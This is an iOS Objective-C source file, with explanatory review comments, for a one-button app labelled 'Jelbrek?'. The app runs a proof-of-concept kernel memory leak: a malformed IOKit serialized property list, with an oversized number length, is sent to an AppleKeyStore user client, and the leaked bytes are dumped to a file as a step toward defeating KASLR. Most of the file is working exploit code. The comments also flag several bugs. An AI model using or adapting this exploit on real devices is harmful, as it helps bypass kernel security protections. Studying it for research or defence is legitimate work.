- #import "RootViewController.h"
- #import <mach/mach.h>
- #import <stdio.h>
- #import <stdlib.h>
- #import <unistd.h>
- #import <string.h>
- #import <assert.h>
- #import <pthread.h>
- #import <sys/syscall.h>
- #import <sys/kauth.h>
- #import <sys/stat.h>
- #import <IOKit/IOKitLib.h>
- #import <IOKit/iokitmig.h>
- #import <IOKit/OSMessageNotification.h>
// Hand-written prototypes for IOKit MIG user-side routines used by the code
// below. They are presumably redeclared because the SDK in use does not export
// them; confirm against <IOKit/iokitmig.h> (imported above), which may already
// declare them — a conflicting duplicate declaration is a compile error.
// Note: io_registry_entry_get_properties is declared but never called in this
// file as shown.
kern_return_t io_service_open_extended(mach_port_t service, task_t owningTask, uint32_t connect_type, NDR_record_t ndr, io_buf_ptr_t properties, mach_msg_type_number_t propertiesCnt, kern_return_t *result, mach_port_t *connection);
kern_return_t io_registry_entry_get_properties(mach_port_t registry_entry, io_buf_ptr_t *properties, mach_msg_type_number_t *propertiesCnt);
kern_return_t io_service_get_matching_services_bin(mach_port_t master_port, io_struct_inband_t matching, mach_msg_type_number_t matchingCnt, mach_port_t *existing);
@implementation RootViewController

// Type tags of the IOKit binary property-list encoding (OSSerializeBinary).
// Each 32-bit word carries a tag in its upper bits (kOSSerializeTypeMask) and
// a length/count in the low 24 bits (kOSSerializeDataMask); the
// kOSSerializeEndCollection bit marks the last element of the enclosing
// collection. The dict[] below is built from these by hand.
enum {
    kOSSerializeDictionary = 0x01000000U,
    kOSSerializeArray = 0x02000000U,
    kOSSerializeSet = 0x03000000U,
    kOSSerializeNumber = 0x04000000U,
    kOSSerializeSymbol = 0x08000000U,
    kOSSerializeString = 0x09000000U,
    kOSSerializeData = 0x0a000000U,
    kOSSerializeBoolean = 0x0b000000U,
    kOSSerializeObject = 0x0c000000U,
    kOSSerializeTypeMask = 0x7F000000U,
    kOSSerializeDataMask = 0x00FFFFFFU,
    kOSSerializeEndCollection = 0x80000000U,
};

// Builds the single-button UI that triggers the proof of concept.
// NOTE(review): [super viewDidLoad] is never called, which lifecycle
// overrides are expected to do.
- (void)viewDidLoad {
    self.view.backgroundColor = [UIColor whiteColor];
    UIButton *myButton = [UIButton buttonWithType:UIButtonTypeRoundedRect];
    myButton.frame = CGRectMake(21, 80, 100, 35);
    [myButton setTitle:@"Jelbrek?" forState:UIControlStateNormal];
    [myButton addTarget:self action:@selector(myButtonPressed) forControlEvents:UIControlEventTouchUpInside];
    [self.view addSubview:myButton];
}

// Button handler. get_kernel_slide() is defined further down with no prior
// prototype, so this call relies on an implicit declaration (a warning or,
// with newer clang, an error); its return value is discarded.
- (void) myButtonPressed {
    get_kernel_slide();
}

// Proof-of-concept kernel memory disclosure through IOKit property
// deserialization. A hand-built binary property list (dict[]) is submitted as
// the properties of a new AppleKeyStore user client; a property named "AAA"
// is then read back through the registry and 128 bytes of the returned buffer
// are written to /var/mobile/kaslr_dump.txt.
//
// Despite the name, nothing here computes a slide: kslide and fixedAddr are
// never used. The return type is unsigned int, the two "return -1" paths wrap
// to UINT_MAX, and the success path falls off the end of the function with no
// return statement (undefined behaviour for a non-void function).
unsigned int get_kernel_slide() {
    unsigned int kslide = 0;
    unsigned int fixedAddr = 0;
    // Serialized property list, one 32-bit little-endian word per element:
    //   0x000000d3 - presumably the OSSerializeBinary signature word
    //   dictionary with 2 entries, marked as the end of the outer collection
    //   symbol, 4 bytes: "AAA\0" (0x00414141) — the property key read back below
    //   number with 0x200 in its length field, end of collection
    //   two words of 0x41414141 — the only payload actually supplied
    // The declared number length far exceeds the payload that follows; this
    // mismatch is presumably what makes the read-back return kernel memory
    // that was never written by this process (the "leak" referred to below).
    uint32_t dict[] = {
        0x000000d3,
        kOSSerializeEndCollection | kOSSerializeDictionary | 2,
        kOSSerializeSymbol | 4,
        0x00414141,
        kOSSerializeEndCollection | kOSSerializeNumber | 0x200,
        0x41414141,
        0x41414141
    };
    size_t idx = sizeof(dict);
    io_service_t serv = 0;
    io_connect_t conn = 0;
    io_iterator_t iter = 0;
    mach_port_t master = MACH_PORT_NULL, res = MACH_PORT_NULL;
    kern_return_t kr = 0, err = 0;
    // Obtain the IOKit master port (return value not checked).
    host_get_io_master(mach_host_self(), &master);
    // Submit dict[] as a matching dictionary first, purely to confirm the
    // kernel accepts the serialized form before it is used for the open.
    kr = io_service_get_matching_services_bin(master, (char*)dict, idx, &res);
    if(kr == KERN_SUCCESS) {
        // dict parsed successfully
    } else {
        return -1;
    }
    // Look up the AppleKeyStore service (serv is not checked for 0 before use).
    serv = IOServiceGetMatchingService(master, IOServiceMatching("AppleKeyStore"));
    // Open a user client, passing dict[] as its properties; err receives the
    // kernel-side result but is never examined.
    kr = io_service_open_extended(serv, mach_task_self(), 0, NDR_record, (io_buf_ptr_t)dict, idx, &err, &conn);
    if(kr == KERN_SUCCESS) {
        // user client created
    } else { // open failed
        return -1;
    }
    // Walk the registry recursively beneath the service (iterator creation is
    // not checked).
    IORegistryEntryCreateIterator(serv, "IOService", kIORegistryIterateRecursively, &iter);
    io_object_t object = 0;
    uint32_t bytes = 0;
    char buf[0x200] = {0};
    // Read the "AAA" property from each entry until a buffer whose first word
    // is non-zero comes back. Hazards: kr from the read is never inspected,
    // and if the iterator is exhausted IOIteratorNext returns 0 and this loop
    // never terminates.
    while(bytes == 0) {
        if(object) {
            // release the entry from the previous iteration
            IOObjectRelease(object);
        }
        object = IOIteratorNext(iter);
        mach_msg_type_number_t bufCnt = 0x200;
        // read the 'AAA' property bytes into buf (up to 0x200 bytes)
        kr = io_registry_entry_get_property_bytes(object, (char*)"AAA", (char*)&buf, &bufCnt);
        bytes = *(uint32_t*)(buf);
    }
    // buf now holds the returned (leaked) data; dump its first 128 bytes as
    // 32 hex words, one per line. fopen's result is not checked — a NULL
    // FILE* here crashes in fprintf. The last iteration's object and the
    // iterator/connection ports are never released.
    FILE *f = fopen("/var/mobile/kaslr_dump.txt", "w");
    for (int a = 0; a < 128; a += 4) {
        fprintf(f, "%#x\n", *(uint32_t*)(buf + a));
    }
    fclose(f);
}
@end